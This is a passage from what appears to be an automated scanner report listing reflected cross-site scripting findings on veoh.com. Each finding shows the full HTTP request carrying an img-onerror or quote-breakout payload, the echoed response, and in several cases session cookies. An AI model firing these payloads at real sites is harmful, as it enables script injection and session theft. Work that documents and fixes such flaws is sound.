The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815 was submitted in the REST URL parameter 4. This input was echoed as 4957f"><img src=a onerror=alert(1)>b411440d815 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f"><img%20src%3da%20onerror%3dalert(1)>b411440d815/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:38 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:38 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure4957f"><img src=a onerror=alert(1)>b411440d815/sort/most viewed" selected="selected">
...[SNIP]...

1.17. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8770d'%3bee4aadffdc5 was submitted in the REST URL parameter 6. This input was echoed as 8770d';ee4aadffdc5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j88770d'%3bee4aadffdc5/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=FED204EF-9DC2-336D-4AB6-05EAB5021E64&LastUpdate=03/Feb/2011:12:32:04 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:32:04 GMT; Path=/
Date: Thu, 03 Feb 2011 20:32:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 94943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'9aef285b016775eac1368647ddf6c815',
'v18978294NGnK88j88770d';ee4aadffdc5'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.18. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb was submitted in the REST URL parameter 4. This input was echoed as 5c238<img src=a onerror=alert(1)>411e688a8fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:48 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure5c238<img src=a onerror=alert(1)>411e688a8fb"}</textarea>
...[SNIP]...

1.19. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0 was submitted in the REST URL parameter 4. This input was echoed as 3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure3bcf1"><img%20src%3da%20onerror%3dalert(1)>d1e7de81cf0/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=33
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure3bcf1"><img src=a onerror=alert(1)>d1e7de81cf0/sort/most viewed" selected="selected">
...[SNIP]...

1.20. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47a62'%3b78d21d340d1 was submitted in the REST URL parameter 6. This input was echoed as 47a62';78d21d340d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN47a62'%3b78d21d340d1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:58 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=80
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'f34e2f7249b7650fa7584894a2fd62df',
'v207484775fTsGMdN47a62';78d21d340d1'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.21. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6 was submitted in the REST URL parameter 4. This input was echoed as 43948"><img src=a onerror=alert(1)>46bf4b641b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:11 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure43948"><img src=a onerror=alert(1)>46bf4b641b6/sort/most viewed" selected="selected">
...[SNIP]...

1.22. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72 was submitted in the REST URL parameter 4. This input was echoed as 89285<img src=a onerror=alert(1)>bd2cbbace72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure89285<img src=a onerror=alert(1)>bd2cbbace72"}</textarea>
...[SNIP]...

1.23. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1503'%3b3c33fe8edd6 was submitted in the REST URL parameter 6. This input was echoed as a1503';3c33fe8edd6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZCa1503'%3b3c33fe8edd6 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'0d02849a2731b721fe5fd6d7cd18b899',
'v207490874eKBjfZCa1503';3c33fe8edd6'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.24. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8 was submitted in the REST URL parameter 4. This input was echoed as fb7a9"><img src=a onerror=alert(1)>a20cb2010f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventurefb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=95
Content-Length: 75718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventurefb7a9"><img src=a onerror=alert(1)>a20cb2010f8/sort/most viewed" selected="selected">
...[SNIP]...

1.25. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1 was submitted in the REST URL parameter 4. This input was echoed as 267b0<img src=a onerror=alert(1)>f093e2717f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=47
Content-Length: 75674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure267b0<img src=a onerror=alert(1)>f093e2717f1"}</textarea>
...[SNIP]...

1.26. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9339'%3bd4a836c8b6c was submitted in the REST URL parameter 6. This input was echoed as a9339';d4a836c8b6c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekAa9339'%3bd4a836c8b6c HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:16 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=14
Content-Length: 94049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'1866d7d6148455dd31ade42934b7bfb0',
'v20749145FCR2QekAa9339';d4a836c8b6c'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

1.27. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576 was submitted in the REST URL parameter 4. This input was echoed as e2bc5<img src=a onerror=alert(1)>20ab6849576 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventuree2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
